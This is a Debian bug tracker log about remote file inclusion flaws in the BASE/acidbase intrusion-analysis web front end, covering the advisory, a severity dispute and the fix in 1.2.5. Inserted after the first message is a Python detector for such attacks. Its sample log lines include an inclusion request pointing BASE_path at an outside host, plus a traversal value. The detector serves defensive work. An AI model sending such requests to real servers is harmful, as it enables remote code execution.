Debian Bug report logs - #370576
acidbase: Remote File Inclusion Vulnerabilities


Package: acidbase; Maintainer for acidbase is (unknown);

Reported by: David Gil <dgil@telefonica.net>

Date: Mon, 5 Jun 2006 23:03:06 UTC

Severity: minor

Tags: fixed-upstream, security

Fixed in version acidbase/1.2.5-1

Done: David Gil <dgil@telefonica.net>

Bug is archived. No further changes may be made.



Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to David Gil <dgil@telefonica.net>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>. (full text, mbox, link).


Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: David Gil <dgil@telefonica.net>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: acidbase: Remote File Inclusion Vulnerabilities
Date: Tue, 06 Jun 2006 00:24:25 +0200
Package: acidbase
Severity: grave
Tags: security
Justification: user security hole

 http://www.frsirt.com/english/advisories/2006/1996

 Advisory ID : FrSIRT/ADV-2006-1996
 CVE ID : GENERIC-MAP-NOMATCH
 Rated as : High Risk 
 Remotely Exploitable : Yes
 Locally Exploitable : Yes
 Release Date : 2006-05-26

 Technical Description

 Multiple vulnerabilities have been identified in Basic Analysis and Security
 Engine (BASE), which could be exploited by attackers to execute arbitrary
 commands. These flaws are due to input validation errors in the
 "base_qry_common.php", "base_stat_common.php", and
 "includes/base_include.inc.php" scripts that do not validate the "BASE_path"
 parameter, which could be exploited by remote attackers to include malicious
 scripts and execute arbitrary commands with the privileges of the web server.

 Affected Products

 Basic Analysis and Security Engine (BASE) 1.2.4 and prior 

-- System Information:
Debian Release: testing/unstable
  APT prefers unstable
  APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.6.16-2-686
Locale: LANG=es_ES@euro, LC_CTYPE=es_ES@euro (charmap=ISO-8859-15)
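Detection logic for the flaw the advisory above describes, added here as an illustration (this is not code from the bug report or from the BASE project): it scans web server access-log lines for requests that hand a BASE_path parameter to the three scripts the advisory names, the input those scripts fail to validate. The Apache combined log format is an assumption, and the sample lines are constructed for this example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Scripts the advisory names as reading BASE_path without validating it.
AFFECTED_SCRIPTS = ("base_qry_common.php", "base_stat_common.php",
                    "includes/base_include.inc.php")
# A BASE_path that makes include() leave the install tree: URL or PHP stream wrapper.
_REMOTE_OR_WRAPPER = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//|^(?:php|data|expect|phar):", re.I)
# Apache combined log format (assumed): client, timestamp, request line, status.
_LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                     r'"\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def classify_request(target):
    """Flag a request handing BASE_path to an affected script. Any externally
    supplied value is a finding: with register_globals=On it lands in the
    script's global scope, which is the condition the bug needs."""
    parts = urlsplit(target)
    script = parts.path.lstrip("/")
    if not any(script.endswith(s) for s in AFFECTED_SCRIPTS):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("BASE_path", []):
        decoded = unquote(value)  # strip a second layer of URL encoding, if any
        if _REMOTE_OR_WRAPPER.search(decoded) or ".." in decoded:
            return {"script": script, "base_path": decoded, "kind": "remote_or_traversal"}
        return {"script": script, "base_path": decoded, "kind": "external_assignment"}
    return None

def scan_log(lines):
    """Run classify_request over access-log lines; return one dict per hit."""
    findings = []
    for line in lines:
        m = _LOG_RE.match(line)
        if m is None:
            continue
        hit = classify_request(m.group("target"))
        if hit:
            hit.update(ip=m.group("ip"), status=int(m.group("status")))
            findings.append(hit)
    return findings

# Constructed sample lines (RFC 5737 documentation addresses, placeholder paths).
SAMPLE_LOG = [
    '203.0.113.5 - - [06/Jun/2006:00:24:25 +0200] "GET /base/base_qry_common.php'
    '?BASE_path=http://198.51.100.9/placeholder%3F HTTP/1.0" 200 512 "-" "-"',
    '203.0.113.5 - - [06/Jun/2006:00:24:30 +0200] "GET /base/includes/'
    'base_include.inc.php?BASE_path=..%2F..%2Ftmp HTTP/1.0" 200 512 "-" "-"',
    '198.51.100.2 - - [06/Jun/2006:00:25:01 +0200] "GET /base/base_main.php HTTP/1.1" 200 7021 "-" "-"',
    '198.51.100.2 - - [06/Jun/2006:00:25:07 +0200] "GET /base/base_stat_common.php'
    '?BASE_path=/var/www/base HTTP/1.1" 200 4432 "-" "-"',
]
```

Running `scan_log(SAMPLE_LOG)` yields three findings: two remote/traversal values and one plain external assignment, which is still worth alerting on because a correctly configured install never takes BASE_path from the request.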



Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to David Gil <dgil@telefonica.net>:
Extra info received and forwarded to list. (full text, mbox, link).


Message #10 received at 370576@bugs.debian.org (full text, mbox, reply):

From: David Gil <dgil@telefonica.net>
To: 370576@bugs.debian.org
Cc: control@bugs.debian.org
Subject: acidbase: Remote File Inclusion Vulnerabilities
Date: Tue, 06 Jun 2006 01:41:57 +0200
tags 370576 + fixed-upstream pending
thanks

Fixed in upstream BASE 1.2.5 (sarah). Expect a new package in a few
days.





Tags added: fixed-upstream, pending Request was from David Gil <dgil@telefonica.net> to control@bugs.debian.org. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>. (full text, mbox, link).


Message #17 received at submit@bugs.debian.org (full text, mbox, reply):

From: Kevin Johnson <kjohnson@secureideas.net>
To: David Gil <dgil@telefonica.net>, 370576@bugs.debian.org
Cc: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: Re: Bug#370576: acidbase: Remote File Inclusion Vulnerabilities
Date: Tue, 6 Jun 2006 13:01:11 -0400
I have to disagree with the Severity of grave.  To exploit you need  
to have register_globals set to on which has not been the default in  
years.  We have released 1.2.5 which fixes the issue and a number of  
other things.  It just gets under my skin when "researchers" find  
problems, elevate how serious they are and never notify the  
development team.

Sorry for my rant,
Kevin
---------------------
BASE Project Lead
http://sourceforge.net/projects/secureideas
http://base.secureideas.net
The next step in IDS analysis!

On Jun 5, 2006, at 6:24 PM, David Gil wrote:

> Package: acidbase
> Severity: grave
> Tags: security
> Justification: user security hole
>
>  http://www.frsirt.com/english/advisories/2006/1996
>
>  Advisory ID : FrSIRT/ADV-2006-1996
>  CVE ID : GENERIC-MAP-NOMATCH
>  Rated as : High Risk
>  Remotely Exploitable : Yes
>  Locally Exploitable : Yes
>  Release Date : 2006-05-26
>
>  Technical Description
>
>  Multiple vulnerabilities have been identified in Basic Analysis and Security
>  Engine (BASE), which could be exploited by attackers to execute arbitrary
>  commands. These flaws are due to input validation errors in the
>  "base_qry_common.php", "base_stat_common.php", and
>  "includes/base_include.inc.php" scripts that do not validate the "BASE_path"
>  parameter, which could be exploited by remote attackers to include malicious
>  scripts and execute arbitrary commands with the privileges of the web server.
>
>  Affected Products
>
>  Basic Analysis and Security Engine (BASE) 1.2.4 and prior
>
> -- System Information:
> Debian Release: testing/unstable
>   APT prefers unstable
>   APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
> Architecture: i386 (i686)
> Shell:  /bin/sh linked to /bin/bash
> Kernel: Linux 2.6.16-2-686
> Locale: LANG=es_ES@euro, LC_CTYPE=es_ES@euro (charmap=ISO-8859-15)
>
>






Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>. (full text, mbox, link).


Information forwarded to debian-bugs-dist@lists.debian.org:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to David Gil <dgil@telefonica.net>:
Extra info received and forwarded to list. (full text, mbox, link).


Message #27 received at 370576@bugs.debian.org (full text, mbox, reply):

From: David Gil <dgil@telefonica.net>
To: Kevin Johnson <kjohnson@secureideas.net>, 370576@bugs.debian.org
Cc: control@bugs.debian.org
Subject: Re: Bug#370576: acidbase: Remote File Inclusion Vulnerabilities
Date: Wed, 07 Jun 2006 11:08:29 +0200
severity 370576 minor
thanks

On Tue, 06-06-2006 at 13:01 -0400, Kevin Johnson wrote:
> I have to disagree with the Severity of grave.  To exploit you need  
> to have register_globals set to on which has not been the default in  
> years. 

Ok, now the bug has a minor severity. You are right, base is not
exploitable with the default installation of the package.

> We have released 1.2.5 which fixes the issue and a number of  
> other things.

Yes, I am aware of it. We'll upload it in a few days. I've submitted the
bug report to inform the security team (testing distribution has also
base 1.2.4) and to explain in more depth the changes in the 1.2.5
changelog.

> It just gets under my skin when "researchers" find  
> problems, elevate how serious they are and never notify the  
> development team.

Well, I don't understand you Kevin. I know you are subscribed to the
package tracking system of acidbase, so I know that you receive all the
bugs submitted to the package too. If you don't agree with the severity
of a bug, you can always change it as I've just done.

> Sorry for my rant,
> Kevin

Regards,
David.





Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>:
Bug#370576; Package acidbase. (full text, mbox, link).


Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>. (full text, mbox, link).


Message #32 received at 370576@bugs.debian.org (full text, mbox, reply):

From: Kevin Johnson <kjohnson@secureideas.net>
To: David Gil <dgil@telefonica.net>
Cc: 370576@bugs.debian.org, control@bugs.debian.org
Subject: Re: Bug#370576: acidbase: Remote File Inclusion Vulnerabilities
Date: Wed, 7 Jun 2006 07:09:37 -0400
On Jun 7, 2006, at 5:08 AM, David Gil wrote:

> severity 370576 minor
> thanks
>

Thanks...

> On Tue, 06-06-2006 at 13:01 -0400, Kevin Johnson wrote:
>> I have to disagree with the Severity of grave.  To exploit you need
>> to have register_globals set to on which has not been the default in
>> years.
>
> Ok, now the bug has a minor severity. You are right, base is not
> exploitable with the default installation of the package.
>
>> We have released 1.2.5 which fixes the issue and a number of
>> other things.
>
> Yes, I am aware of it. We'll upload it in a few days. I've submitted the
> bug report to inform the security team (testing distribution has also
> base 1.2.4) and to explain in more depth the changes in the 1.2.5
> changelog.
>

Great... I appreciate it...

>> It just gets under my skin when "researchers" find
>> problems, elevate how serious they are and never notify the
>> development team.
>
> Well, I don't understand you Kevin. I know you are subscribed to the
> package tracking system of acidbase, so I know that you receive all the
> bugs submitted to the package too. If you don't agree with the severity
> of a bug, you can always change it as I've just done.
>

Sorry, this was not meant toward you.  I was speaking of St0ke and
Milw0rm.  I apologize for venting at you and the bug tracking
system.  As to changing the severity, I forgot.  We have been busy
around here since my new daughter arrived Monday.

>> Sorry for my rant,
>> Kevin
>
> Regards,
> David.
>
>

Thanks
Kevin
---------------------
BASE Project Lead
http://sourceforge.net/projects/secureideas
http://base.secureideas.net
The next step in IDS analysis!





Severity set to `minor' from `grave' Request was from David Gil <dgil@telefonica.net> to control@bugs.debian.org. (full text, mbox, link).


Reply sent to David Gil <dgil@telefonica.net>:
You have taken responsibility. (full text, mbox, link).


Notification sent to David Gil <dgil@telefonica.net>:
Bug acknowledged by developer. (full text, mbox, link).


Message #39 received at 370576-close@bugs.debian.org (full text, mbox, reply):

From: David Gil <dgil@telefonica.net>
To: 370576-close@bugs.debian.org
Subject: Bug#370576: fixed in acidbase 1.2.5-1
Date: Tue, 13 Jun 2006 11:02:04 -0700
Source: acidbase
Source-Version: 1.2.5-1

We believe that the bug you reported is fixed in the latest version of
acidbase, which is due to be installed in the Debian FTP archive:

acidbase_1.2.5-1.diff.gz
  to pool/main/a/acidbase/acidbase_1.2.5-1.diff.gz
acidbase_1.2.5-1.dsc
  to pool/main/a/acidbase/acidbase_1.2.5-1.dsc
acidbase_1.2.5-1_all.deb
  to pool/main/a/acidbase/acidbase_1.2.5-1_all.deb
acidbase_1.2.5.orig.tar.gz
  to pool/main/a/acidbase/acidbase_1.2.5.orig.tar.gz



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 370576@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
David Gil <dgil@telefonica.net> (supplier of updated acidbase package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)



Format: 1.7
Date: Mon, 12 Jun 2006 21:20:37 +0200
Source: acidbase
Binary: acidbase
Architecture: source all
Version: 1.2.5-1
Distribution: unstable
Urgency: high
Maintainer: David Gil <dgil@telefonica.net>
Changed-By: David Gil <dgil@telefonica.net>
Description: 
 acidbase   - Basic Analysis and Security Engine
Closes: 363548 370576
Changes: 
 acidbase (1.2.5-1) unstable; urgency=high
 .
   * New upstream release, which includes the following security improvements:
      + Added XSSPrintSafe() (array safe htmlspecialchars() function) and made
        filterSql() use ADOdb qmagic()
      + Filtered all unfiltered (mainly auth system stuff) $_POST and $_GET
        variables using filterSql()
      + Sanitized all $_SERVER variables to be protected against XSS attacks
     These improvements fix the following security bugs:
      + Cross-site scripting (XSS) vulnerability (CVE-2006-1590)
        (Closes: #363548).
      + Remote File Inclusion Vulnerabilities (CVE-2006-2685)
        (Closes: #370576).
 .
   * debian/patches/02_update_external_links.dpatch : updated.
 .
   * Applied part of the patch from Paul Wise <pabs3@bonedaddy.net>:
     + Remove short description from long description
     + Update copyright file with more information
 .
   * Bump Standards-Version to 3.7.2 (no policy-related changes needed).
 .
   * Fix an annoying dbconfig-common error: Add dbc_dbtypes variable in
     maintainer scripts, not only in config file.
     This is related to bug #372948 (dbconfig-common: can not determine the
     database type).
 .
   * Remove ucf file under /etc/acidbase on package purge.
Files: 
 1627500fb735f4ce19a137031d59c0c3 683 web optional acidbase_1.2.5-1.dsc
 cd6a83df67106ebf9a148d5ac1ec9b8c 335819 web optional acidbase_1.2.5.orig.tar.gz
 3cc7ab0405eaf4e2539f64a175af64f6 14891 web optional acidbase_1.2.5-1.diff.gz
 15ce906b026e9bb7d89a4c9dd600e28d 346322 web optional acidbase_1.2.5-1_all.deb





Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Tue, 26 Jun 2007 14:50:10 GMT) (full text, mbox, link).




Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Fri Apr 18 11:51:16 2025; Machine Name: buxtehude
